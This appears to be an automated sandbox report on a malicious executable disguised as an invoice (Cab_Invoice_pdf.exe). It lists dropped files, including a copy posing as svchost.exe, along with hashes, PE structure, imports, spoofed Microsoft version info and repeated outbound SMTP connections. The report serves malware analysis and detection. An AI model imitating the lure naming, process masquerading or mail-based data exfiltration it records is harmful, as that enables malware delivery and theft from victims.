                          SHA1:91739F4227A6DFA4F1F107DD19D01B9E2C90C177
                          SHA-256:9BA207206559F40D534100DF3C847E2A67D8008A8EE98E991D5CD6B0813B8624
                          SHA-512:552F4C4892C453B64CE84D8DBEB9B15E3506A0666867AF5CFB28C6B167E2C81F8EED0A8598DEEBB38C90D0B2CCBEC69223C2D487256541D041D85B2F0FDC871D
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?&+.{GE.{GE.{GE.r?...GE.@.D.yGE.@.F.zGE.@.@.qGE.@.A.pGE...D.yGE.o!D.yGE..%D.~GE.{GD.(GE...@.zGE...E.zGE...G.zGE.Rich{GE.........................PE..L....^._...........!.....*...(.......*.......@............................................@..........................M..T....N..........\............................I..T...........................HJ..@............@..h............................text....(.......*.................. ..`.rdata..N....@......................@..@.data...H....`.......H..............@....gfids.......p.......J..............@..@.rsrc...\............L..............@..@.reloc...............P..............@..B................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI63082\win32gui.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):176128
                          Entropy (8bit):6.424412252153223
                          Encrypted:false
                          SSDEEP:3072:uVvRKIA/oqLcDwPY5Fej7oLyqx9NkdMiCawrLwCNzR0jzlZ+6KLDtW8d7U:6RNA/oqLcDwPY5FeCNkdMiCasvRIK6KE
                          MD5:844D345409407D3C470219342EFBD80C
                          SHA1:70612D8676009CC780ABE61583996473F027334A
                          SHA-256:42898717D0D574B6C4BEAD3C07A67368FCBFC49F498997A3A08E24612F4EF365
                          SHA-512:8A54414DA2D72331441AE5F47690F91C676ED6CD2B96B57AAE783774E5A1FE03F225DDD1DFDAE77E93897E3AE3DA7609A99448184C6BB1D92D3D600BAD17D7A4
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........r..r..r..r.....r..,..r..,..r..,..r..,..r...,..r.....r......r..r...s...,..r...,..r...,..r..Rich.r..........................PE..L....^._...........!......................................................................@..........................3..h....3..........T........................:...*..T...........................H+..@............................................text...N........................... ..`.rdata..j...........................@..@.data...X ...`.......P..............@....gfids..L............n..............@..@.rsrc...T............p..............@..@.reloc...:.......<...t..............@..B................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Roaming\svchost.exe
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):7399848
                          Entropy (8bit):7.994931693267312
                          Encrypted:true
                          SSDEEP:196608:ACUMtXu1qryKbnaqp0VG1p/kuszht6NZq:+Mte1UyKbnaW0M1VMQ
                          MD5:E5DC6A7459FD6EF46AFEE60318470B03
                          SHA1:C0A036DEF9B2D42804C164B156AAF007D9FFFA02
                          SHA-256:EA0FD73223E8313DA714A6924C1DFAE72F2C976935C2B323A6B192C063B0063A
                          SHA-512:3BB89920AB154111875279E57624436258A8ECC65B627FCB06445D868A9239EEA862B1BD7E7992BE861AF18C629262B323112AA056544F28885343B1C051803A
                          Malicious:true
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..}...}...}.....@.q.....B......C.e....5v.~...F..o...F..`...F..o...jz.t...}..........m.....N.|......|...Rich}...........PE..L......_.........."..........X.......z............@.......................... ............@.....................................d........|.......................................................... ...@............................................text...t........................... ..`.rdata..F...........................@..@.data...x...........................@....gfids.......p......................@..@.rsrc....|.......~..................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................
                          C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                          Process:C:\Windows\System32\svchost.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):55
                          Entropy (8bit):4.306461250274409
                          Encrypted:false
                          SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                          MD5:DCA83F08D448911A14C22EBCACC5AD57
                          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                          Malicious:false
                          Reputation:unknown
                          Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.994931693267312
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:Cab_Invoice_pdf.exe
                          File size:7399848
                          MD5:e5dc6a7459fd6ef46afee60318470b03
                          SHA1:c0a036def9b2d42804c164b156aaf007d9fffa02
                          SHA256:ea0fd73223e8313da714a6924c1dfae72f2c976935c2b323a6b192c063b0063a
                          SHA512:3bb89920ab154111875279e57624436258a8ecc65b627fcb06445d868a9239eea862b1bd7e7992be861af18c629262b323112aa056544f28885343b1c051803a
                          SSDEEP:196608:ACUMtXu1qryKbnaqp0VG1p/kuszht6NZq:+Mte1UyKbnaW0M1VMQ
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9...}...}...}.....@.q.....B.......C.e....5v.~...F...o...F...`...F...o....jz.t...}...........m.....N.|.......|...Rich}..........

                          File Icon

                          Icon Hash:e0c88898988884bc

                          Static PE Info

                          General

                          Entrypoint:0x407ad3
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                          DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                          Time Stamp:0x5FFEC18A [Wed Jan 13 09:46:50 2021 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:1
                          File Version Major:5
                          File Version Minor:1
                          Subsystem Version Major:5
                          Subsystem Version Minor:1
                          Import Hash:4f699d9195f8b90fd792f147d3831279

                          Entrypoint Preview

                          Instruction
                          call 00007F2AF83A103Eh
                          jmp 00007F2AF83A09B3h
                          int3
                          int3
                          int3
                          push edi
                          push esi
                          push ebx
                          xor edi, edi
                          mov eax, dword ptr [esp+14h]
                          or eax, eax
                          jnl 00007F2AF83A0B36h
                          inc edi
                          mov edx, dword ptr [esp+10h]
                          neg eax
                          neg edx
                          sbb eax, 00000000h
                          mov dword ptr [esp+14h], eax
                          mov dword ptr [esp+10h], edx
                          mov eax, dword ptr [esp+1Ch]
                          or eax, eax
                          jnl 00007F2AF83A0B36h
                          inc edi
                          mov edx, dword ptr [esp+18h]
                          neg eax
                          neg edx
                          sbb eax, 00000000h
                          mov dword ptr [esp+1Ch], eax
                          mov dword ptr [esp+18h], edx
                          or eax, eax
                          jne 00007F2AF83A0B3Ah
                          mov ecx, dword ptr [esp+18h]
                          mov eax, dword ptr [esp+14h]
                          xor edx, edx
                          div ecx
                          mov ebx, eax
                          mov eax, dword ptr [esp+10h]
                          div ecx
                          mov edx, ebx
                          jmp 00007F2AF83A0B63h
                          mov ebx, eax
                          mov ecx, dword ptr [esp+18h]
                          mov edx, dword ptr [esp+14h]
                          mov eax, dword ptr [esp+10h]
                          shr ebx, 1
                          rcr ecx, 1
                          shr edx, 1
                          rcr eax, 1
                          or ebx, ebx
                          jne 00007F2AF83A0B16h
                          div ecx
                          mov esi, eax
                          mul dword ptr [esp+1Ch]
                          mov ecx, eax
                          mov eax, dword ptr [esp+18h]
                          mul esi
                          add edx, ecx
                          jc 00007F2AF83A0B30h
                          cmp edx, dword ptr [esp+14h]
                          jnbe 00007F2AF83A0B2Ah
                          jc 00007F2AF83A0B29h
                          cmp eax, dword ptr [esp+10h]
                          jbe 00007F2AF83A0B23h
                          dec esi
                          xor edx, edx
                          mov eax, esi
                          dec edi
                          jne 00007F2AF83A0B29h
                          neg edx
                          neg eax
                          sbb edx, 00000000h
                          pop ebx
                          pop esi
                          pop edi
                          retn 0010h
                          push ebp
                          mov ebp, esp
                          push 00000000h
                          call dword ptr [00420084h]
                          push dword ptr [ebp+08h]
                          call dword ptr [00000080h]

                          Rich Headers

                          Programming Language:
                          • [RES] VS2015 UPD3 build 24213

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x2aaac0x64.rdata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x380000x7cd8.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x400000x17c8.reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x2a1000x1c.rdata
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2a1200x40.rdata
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x200000x19c.rdata
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x10000x1e9740x1ea00False0.575279017857MPEG-4 LOAS6.64612882784IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                          .rdata0x200000xb4460xb600False0.557842548077data6.07584328103IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .data0x2c0000xa6780xa00False0.15data1.92492004093IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                          .gfids0x370000xb80x200False0.298828125data1.80091798684IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .rsrc0x380000x7cd80x7e00False0.537419394841data6.72459510449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .reloc0x400000x17c80x1800False0.809244791667data6.6658882991IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                          Resources

                          NameRVASizeTypeLanguageCountry
                          RT_ICON0x381f00x2db3PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                          RT_ICON0x3afa40x25a8data
                          RT_ICON0x3d54c0x10a8data
                          RT_ICON0x3e5f40x988data
                          RT_ICON0x3ef7c0x468GLS_BINARY_LSB_FIRST
                          RT_GROUP_ICON0x3f3e40x4cdata
                          RT_VERSION0x3f4300x2d4data
                          RT_MANIFEST0x3f7040x5d2XML 1.0 document, ASCII text, with CRLF line terminators

                          Imports

                          DLLImport
                          USER32.dllMessageBoxW, MessageBoxA
                          KERNEL32.dllGetModuleFileNameW, GetProcAddress, GetCommandLineW, GetEnvironmentVariableW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, CreateDirectoryW, GetTempPathW, WaitForSingleObject, Sleep, SetDllDirectoryW, CreateProcessW, GetStartupInfoW, LoadLibraryExW, CloseHandle, GetCurrentProcess, LocalFree, FormatMessageW, LoadLibraryA, MultiByteToWideChar, WideCharToMultiByte, GetLastError, DecodePointer, GetExitCodeProcess, CreateFileW, SetEndOfFile, HeapReAlloc, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetModuleHandleW, RtlUnwind, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetCommandLineA, ReadFile, RaiseException, GetDriveTypeW, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, GetFullPathNameW, RemoveDirectoryW, FindClose, FindFirstFileExW, FindNextFileW, SetStdHandle, SetConsoleCtrlHandler, DeleteFileW, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, GetACP, HeapFree, HeapAlloc, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleCP, CompareStringW, LCMapStringW, GetCurrentDirectoryW, FlushFileBuffers, SetEnvironmentVariableA, GetFileAttributesExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetStringTypeW, GetProcessHeap, WriteConsoleW, GetTimeZoneInformation, HeapSize
                          ADVAPI32.dllConvertSidToStringSidW, GetTokenInformation, OpenProcessToken, ConvertStringSecurityDescriptorToSecurityDescriptorW
                          WS2_32.dllntohl

                          Version Infos

                          DescriptionData
                          LegalCopyright(c) 2021
                          InternalNameCab_Invoice_pdf.exe
                          FileVersion0.2.4.5
                          CompanyNameMicrosoft Windows
                          ProductName
                          ProductVersion1.0.0.0
                          FileDescriptionMicrosoft Trusted Source
                          OriginalFilenameCab_Invoice_pdf.exe
                          Translation0x0000 0x04b0

                          Network Behavior

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Dec 4, 2021 23:22:00.797451019 CET49751587192.168.2.3142.250.145.108
                          Dec 4, 2021 23:22:00.825141907 CET58749751142.250.145.108192.168.2.3
                          Dec 4, 2021 23:22:00.825284004 CET49751587192.168.2.3142.250.145.108
                          Dec 4, 2021 23:22:00.877780914 CET58749751142.250.145.108192.168.2.3
                          Dec 4, 2021 23:22:00.898792982 CET49751587192.168.2.3142.250.145.108
                          Dec 4, 2021 23:22:00.926503897 CET58749751142.250.145.108192.168.2.3
                          Dec 4, 2021 23:22:00.933149099 CET58749751142.250.145.108192.168.2.3
                          Dec 4, 2021 23:22:00.936467886 CET49751587192.168.2.3142.250.145.108
                          Dec 4, 2021 23:22:00.965125084 CET58749751142.250.145.108192.168.2.3
                          Dec 4, 2021 23:22:00.972073078 CET49751587192.168.2.3142.250.145.108
                          Dec 4, 2021 23:22:01.000042915 CET58749751142.250.145.108192.168.2.3
                          Dec 4, 2021 23:22:01.000092030 CET58749751142.250.145.108192.168.2.3
                          Dec 4, 2021 23:22:01.000132084 CET58749751142.250.145.108192.168.2.3
                          Dec 4, 2021 23:22:01.000159979 CET58749751142.250.145.108192.168.2.3
                          Dec 4, 2021 23:22:01.000293016 CET49751587192.168.2.3142.250.145.108
                          Dec 4, 2021 23:22:01.000332117 CET49751587192.168.2.3142.250.145.108
                          Dec 4, 2021 23:22:01.003460884 CET49751587192.168.2.3142.250.145.108
                          Dec 4, 2021 23:22:01.035655022 CET58749751142.250.145.108192.168.2.3
                          Dec 4, 2021 23:22:01.035815954 CET49751587192.168.2.3142.250.145.108
                          Dec 4, 2021 23:22:01.063183069 CET58749751142.250.145.108192.168.2.3
                          Dec 4, 2021 23:22:01.064171076 CET58749751142.250.145.108192.168.2.3
                          Dec 4, 2021 23:22:01.064924002 CET49751587192.168.2.3142.250.145.108
                          Dec 4, 2021 23:22:01.094252110 CET58749751142.250.145.108192.168.2.3
                          Dec 4, 2021 23:22:01.094849110 CET49751587192.168.2.3142.250.145.108
                          Dec 4, 2021 23:22:01.123759985 CET58749751142.250.145.108192.168.2.3
                          Dec 4, 2021 23:22:01.125336885 CET49751587192.168.2.3142.250.145.108
                          Dec 4, 2021 23:22:01.153670073 CET58749751142.250.145.108192.168.2.3
                          Dec 4, 2021 23:22:01.210083961 CET49751587192.168.2.3142.250.145.108
                          Dec 4, 2021 23:22:16.241935968 CET49754587192.168.2.3142.250.145.108
                          Dec 4, 2021 23:22:16.269125938 CET58749754142.250.145.108192.168.2.3
                          Dec 4, 2021 23:22:16.269294024 CET49754587192.168.2.3142.250.145.108
                          Dec 4, 2021 23:22:16.314048052 CET58749754142.250.145.108192.168.2.3
                          Dec 4, 2021 23:22:16.338690042 CET49754587192.168.2.3142.250.145.108
                          Dec 4, 2021 23:22:16.366163015 CET58749754142.250.145.108192.168.2.3
                          Dec 4, 2021 23:22:16.370438099 CET58749754142.250.145.108192.168.2.3
                          Dec 4, 2021 23:22:16.370827913 CET49754587192.168.2.3142.250.145.108
                          Dec 4, 2021 23:22:16.398401976 CET58749754142.250.145.108192.168.2.3
                          Dec 4, 2021 23:22:16.400577068 CET49754587192.168.2.3142.250.145.108
                          Dec 4, 2021 23:22:16.428421021 CET58749754142.250.145.108192.168.2.3
                          Dec 4, 2021 23:22:16.428467035 CET58749754142.250.145.108192.168.2.3
                          Dec 4, 2021 23:22:16.428505898 CET58749754142.250.145.108192.168.2.3
                          Dec 4, 2021 23:22:16.428534985 CET58749754142.250.145.108192.168.2.3
                          Dec 4, 2021 23:22:16.428570032 CET49754587192.168.2.3142.250.145.108
                          Dec 4, 2021 23:22:16.428617001 CET49754587192.168.2.3142.250.145.108
                          Dec 4, 2021 23:22:16.437885046 CET49754587192.168.2.3142.250.145.108
                          Dec 4, 2021 23:22:16.471168041 CET58749754142.250.145.108192.168.2.3
                          Dec 4, 2021 23:22:16.471288919 CET49754587192.168.2.3142.250.145.108
                          Dec 4, 2021 23:22:16.498481989 CET58749754142.250.145.108192.168.2.3
                          Dec 4, 2021 23:22:16.498895884 CET58749754142.250.145.108192.168.2.3
                          Dec 4, 2021 23:22:16.500438929 CET49754587192.168.2.3142.250.145.108
                          Dec 4, 2021 23:22:16.528901100 CET58749754142.250.145.108192.168.2.3
                          Dec 4, 2021 23:22:16.532830000 CET49754587192.168.2.3142.250.145.108
                          Dec 4, 2021 23:22:16.560601950 CET58749754142.250.145.108192.168.2.3
                          Dec 4, 2021 23:22:16.561451912 CET49754587192.168.2.3142.250.145.108
                          Dec 4, 2021 23:22:16.589047909 CET58749754142.250.145.108192.168.2.3
                          Dec 4, 2021 23:22:16.695658922 CET49754587192.168.2.3142.250.145.108
                          Dec 4, 2021 23:22:31.666729927 CET49775587192.168.2.3142.250.145.109
                          Dec 4, 2021 23:22:31.693948030 CET58749775142.250.145.109192.168.2.3
                          Dec 4, 2021 23:22:31.694078922 CET49775587192.168.2.3142.250.145.109
                          Dec 4, 2021 23:22:31.723155975 CET58749775142.250.145.109192.168.2.3
                          Dec 4, 2021 23:22:31.730998039 CET49775587192.168.2.3142.250.145.109
                          Dec 4, 2021 23:22:31.758337021 CET58749775142.250.145.109192.168.2.3
                          Dec 4, 2021 23:22:31.761789083 CET58749775142.250.145.109192.168.2.3
                          Dec 4, 2021 23:22:31.762145996 CET49775587192.168.2.3142.250.145.109
                          Dec 4, 2021 23:22:31.790158987 CET58749775142.250.145.109192.168.2.3
                          Dec 4, 2021 23:22:31.791326046 CET49775587192.168.2.3142.250.145.109
                          Dec 4, 2021 23:22:31.819499016 CET58749775142.250.145.109192.168.2.3
                          Dec 4, 2021 23:22:31.819555044 CET58749775142.250.145.109192.168.2.3
                          Dec 4, 2021 23:22:31.819595098 CET58749775142.250.145.109192.168.2.3
                          Dec 4, 2021 23:22:31.819624901 CET58749775142.250.145.109192.168.2.3
                          Dec 4, 2021 23:22:31.819642067 CET49775587192.168.2.3142.250.145.109
                          Dec 4, 2021 23:22:31.819822073 CET49775587192.168.2.3142.250.145.109
                          Dec 4, 2021 23:22:31.823175907 CET49775587192.168.2.3142.250.145.109
                          Dec 4, 2021 23:22:31.855763912 CET58749775142.250.145.109192.168.2.3
                          Dec 4, 2021 23:22:31.856379986 CET49775587192.168.2.3142.250.145.109
                          Dec 4, 2021 23:22:31.883791924 CET58749775142.250.145.109192.168.2.3
                          Dec 4, 2021 23:22:31.884005070 CET58749775142.250.145.109192.168.2.3
                          Dec 4, 2021 23:22:31.885015011 CET49775587192.168.2.3142.250.145.109
                          Dec 4, 2021 23:22:31.913419008 CET58749775142.250.145.109192.168.2.3
                          Dec 4, 2021 23:22:31.913809061 CET49775587192.168.2.3142.250.145.109
                          Dec 4, 2021 23:22:31.941423893 CET58749775142.250.145.109192.168.2.3
                          Dec 4, 2021 23:22:31.941797972 CET49775587192.168.2.3142.250.145.109
                          Dec 4, 2021 23:22:31.969718933 CET58749775142.250.145.109192.168.2.3
                          Dec 4, 2021 23:22:32.024945974 CET49775587192.168.2.3142.250.145.109
                          Dec 4, 2021 23:22:47.052114010 CET49783587192.168.2.3142.250.145.109
                          Dec 4, 2021 23:22:47.079458952 CET58749783142.250.145.109192.168.2.3
                          Dec 4, 2021 23:22:47.079566002 CET49783587192.168.2.3142.250.145.109
                          Dec 4, 2021 23:22:47.108661890 CET58749783142.250.145.109192.168.2.3
                          Dec 4, 2021 23:22:47.116483927 CET49783587192.168.2.3142.250.145.109
                          Dec 4, 2021 23:22:47.144289017 CET58749783142.250.145.109192.168.2.3
                          Dec 4, 2021 23:22:47.147772074 CET58749783142.250.145.109192.168.2.3
                          Dec 4, 2021 23:22:47.148196936 CET49783587192.168.2.3142.250.145.109
                          Dec 4, 2021 23:22:47.175952911 CET58749783142.250.145.109192.168.2.3
                          Dec 4, 2021 23:22:47.178212881 CET49783587192.168.2.3142.250.145.109
                          Dec 4, 2021 23:22:47.206049919 CET58749783142.250.145.109192.168.2.3
                          Dec 4, 2021 23:22:47.206099987 CET58749783142.250.145.109192.168.2.3
                          Dec 4, 2021 23:22:47.206140995 CET58749783142.250.145.109192.168.2.3
                          Dec 4, 2021 23:22:47.206170082 CET58749783142.250.145.109192.168.2.3
                          Dec 4, 2021 23:22:47.206224918 CET49783587192.168.2.3142.250.145.109
                          Dec 4, 2021 23:22:47.206347942 CET49783587192.168.2.3142.250.145.109
                          Dec 4, 2021 23:22:47.209108114 CET49783587192.168.2.3142.250.145.109
                          Dec 4, 2021 23:22:47.241422892 CET58749783142.250.145.109192.168.2.3
                          Dec 4, 2021 23:22:47.245135069 CET49783587192.168.2.3142.250.145.109
                          Dec 4, 2021 23:22:47.273231983 CET58749783142.250.145.109192.168.2.3
                          Dec 4, 2021 23:22:47.273802042 CET58749783142.250.145.109192.168.2.3
                          Dec 4, 2021 23:22:47.274549961 CET49783587192.168.2.3142.250.145.109
                          Dec 4, 2021 23:22:47.303133965 CET58749783142.250.145.109192.168.2.3
                          Dec 4, 2021 23:22:47.305154085 CET49783587192.168.2.3142.250.145.109
                          Dec 4, 2021 23:22:47.333262920 CET58749783142.250.145.109192.168.2.3
                          Dec 4, 2021 23:22:47.337383032 CET49783587192.168.2.3142.250.145.109
                          Dec 4, 2021 23:22:47.366827011 CET58749783142.250.145.109192.168.2.3
                          Dec 4, 2021 23:22:47.416929960 CET49783587192.168.2.3142.250.145.109
                          Dec 4, 2021 23:23:02.430051088 CET49796587192.168.2.3142.250.145.109
                          Dec 4, 2021 23:23:02.457784891 CET58749796142.250.145.109192.168.2.3
                          Dec 4, 2021 23:23:02.458100080 CET49796587192.168.2.3142.250.145.109
                          Dec 4, 2021 23:23:02.488786936 CET58749796142.250.145.109192.168.2.3
                          Dec 4, 2021 23:23:02.504710913 CET49796587192.168.2.3142.250.145.109
                          Dec 4, 2021 23:23:02.532383919 CET58749796142.250.145.109192.168.2.3
                          Dec 4, 2021 23:23:02.537081957 CET58749796142.250.145.109192.168.2.3
                          Dec 4, 2021 23:23:02.538055897 CET49796587192.168.2.3142.250.145.109
                          Dec 4, 2021 23:23:02.566308975 CET58749796142.250.145.109192.168.2.3
                          Dec 4, 2021 23:23:02.568629026 CET49796587192.168.2.3142.250.145.109
                          Dec 4, 2021 23:23:02.597007036 CET58749796142.250.145.109192.168.2.3
                          Dec 4, 2021 23:23:02.597062111 CET58749796142.250.145.109192.168.2.3
                          Dec 4, 2021 23:23:02.597100019 CET58749796142.250.145.109192.168.2.3
                          Dec 4, 2021 23:23:02.597131014 CET58749796142.250.145.109192.168.2.3
                          Dec 4, 2021 23:23:02.597237110 CET49796587192.168.2.3142.250.145.109
                          Dec 4, 2021 23:23:02.598329067 CET49796587192.168.2.3142.250.145.109
                          Dec 4, 2021 23:23:02.604464054 CET49796587192.168.2.3142.250.145.109
                          Dec 4, 2021 23:23:02.636209965 CET58749796142.250.145.109192.168.2.3
                          Dec 4, 2021 23:23:02.636440992 CET49796587192.168.2.3142.250.145.109
                          Dec 4, 2021 23:23:02.663908958 CET58749796142.250.145.109192.168.2.3
                          Dec 4, 2021 23:23:02.664613008 CET58749796142.250.145.109192.168.2.3
                          Dec 4, 2021 23:23:02.665759087 CET49796587192.168.2.3142.250.145.109
                          Dec 4, 2021 23:23:02.696016073 CET58749796142.250.145.109192.168.2.3
                          Dec 4, 2021 23:23:02.696362972 CET49796587192.168.2.3142.250.145.109
                          Dec 4, 2021 23:23:02.724282026 CET58749796142.250.145.109192.168.2.3
                          Dec 4, 2021 23:23:02.725794077 CET49796587192.168.2.3142.250.145.109
                          Dec 4, 2021 23:23:02.754019022 CET58749796142.250.145.109192.168.2.3
                          Dec 4, 2021 23:23:02.808841944 CET49796587192.168.2.3142.250.145.109
                          Dec 4, 2021 23:23:17.828969955 CET49826587192.168.2.3142.250.145.108
                          Dec 4, 2021 23:23:17.857728004 CET58749826142.250.145.108192.168.2.3
                          Dec 4, 2021 23:23:17.857820988 CET49826587192.168.2.3142.250.145.108
                          Dec 4, 2021 23:23:17.894715071 CET58749826142.250.145.108192.168.2.3
                          Dec 4, 2021 23:23:17.901521921 CET49826587192.168.2.3142.250.145.108
                          Dec 4, 2021 23:23:17.928951025 CET58749826142.250.145.108192.168.2.3
                          Dec 4, 2021 23:23:17.931472063 CET58749826142.250.145.108192.168.2.3
                          Dec 4, 2021 23:23:17.931767941 CET49826587192.168.2.3142.250.145.108
                          Dec 4, 2021 23:23:17.959590912 CET58749826142.250.145.108192.168.2.3
                          Dec 4, 2021 23:23:17.960521936 CET49826587192.168.2.3142.250.145.108
                          Dec 4, 2021 23:23:17.988358021 CET58749826142.250.145.108192.168.2.3
                          Dec 4, 2021 23:23:17.988409042 CET58749826142.250.145.108192.168.2.3
                          Dec 4, 2021 23:23:17.988435030 CET49826587192.168.2.3142.250.145.108
                          Dec 4, 2021 23:23:17.988465071 CET49826587192.168.2.3142.250.145.108
                          Dec 4, 2021 23:23:17.988491058 CET58749826142.250.145.108192.168.2.3
                          Dec 4, 2021 23:23:17.988531113 CET58749826142.250.145.108192.168.2.3
                          Dec 4, 2021 23:23:17.988548040 CET49826587192.168.2.3142.250.145.108
                          Dec 4, 2021 23:23:17.988588095 CET49826587192.168.2.3142.250.145.108
                          Dec 4, 2021 23:23:17.991085052 CET49826587192.168.2.3142.250.145.108
                          Dec 4, 2021 23:23:18.023664951 CET58749826142.250.145.108192.168.2.3
                          Dec 4, 2021 23:23:18.023741961 CET49826587192.168.2.3142.250.145.108
                          Dec 4, 2021 23:23:18.051158905 CET58749826142.250.145.108192.168.2.3
                          Dec 4, 2021 23:23:18.051512957 CET58749826142.250.145.108192.168.2.3
                          Dec 4, 2021 23:23:18.052081108 CET49826587192.168.2.3142.250.145.108
                          Dec 4, 2021 23:23:18.080575943 CET58749826142.250.145.108192.168.2.3
                          Dec 4, 2021 23:23:18.080965042 CET49826587192.168.2.3142.250.145.108
                          Dec 4, 2021 23:23:18.108911991 CET58749826142.250.145.108192.168.2.3
                          Dec 4, 2021 23:23:18.109189987 CET49826587192.168.2.3142.250.145.108
                          Dec 4, 2021 23:23:18.137177944 CET58749826142.250.145.108192.168.2.3
                          Dec 4, 2021 23:23:18.185122967 CET49826587192.168.2.3142.250.145.108
                          Dec 4, 2021 23:23:33.195705891 CET49829587192.168.2.3142.250.145.109
                          Dec 4, 2021 23:23:33.223289013 CET58749829142.250.145.109192.168.2.3
                          Dec 4, 2021 23:23:33.227480888 CET49829587192.168.2.3142.250.145.109
                          Dec 4, 2021 23:23:33.256963015 CET58749829142.250.145.109192.168.2.3
                          Dec 4, 2021 23:23:33.314471006 CET49829587192.168.2.3142.250.145.109
                          Dec 4, 2021 23:23:33.364650965 CET49829587192.168.2.3142.250.145.109
                          Dec 4, 2021 23:23:33.392090082 CET58749829142.250.145.109192.168.2.3
                          Dec 4, 2021 23:23:33.395736933 CET58749829142.250.145.109192.168.2.3
                          Dec 4, 2021 23:23:33.397391081 CET49829587192.168.2.3142.250.145.109
                          Dec 4, 2021 23:23:33.425539970 CET58749829142.250.145.109192.168.2.3
                          Dec 4, 2021 23:23:33.436631918 CET49829587192.168.2.3142.250.145.109
                          Dec 4, 2021 23:23:33.464735985 CET58749829142.250.145.109192.168.2.3
                          Dec 4, 2021 23:23:33.464790106 CET58749829142.250.145.109192.168.2.3
                          Dec 4, 2021 23:23:33.464818001 CET58749829142.250.145.109192.168.2.3
                          Dec 4, 2021 23:23:33.464839935 CET58749829142.250.145.109192.168.2.3
                          Dec 4, 2021 23:23:33.471946955 CET49829587192.168.2.3142.250.145.109
                          Dec 4, 2021 23:23:33.474601030 CET49829587192.168.2.3142.250.145.109
                          Dec 4, 2021 23:23:33.506288052 CET58749829142.250.145.109192.168.2.3
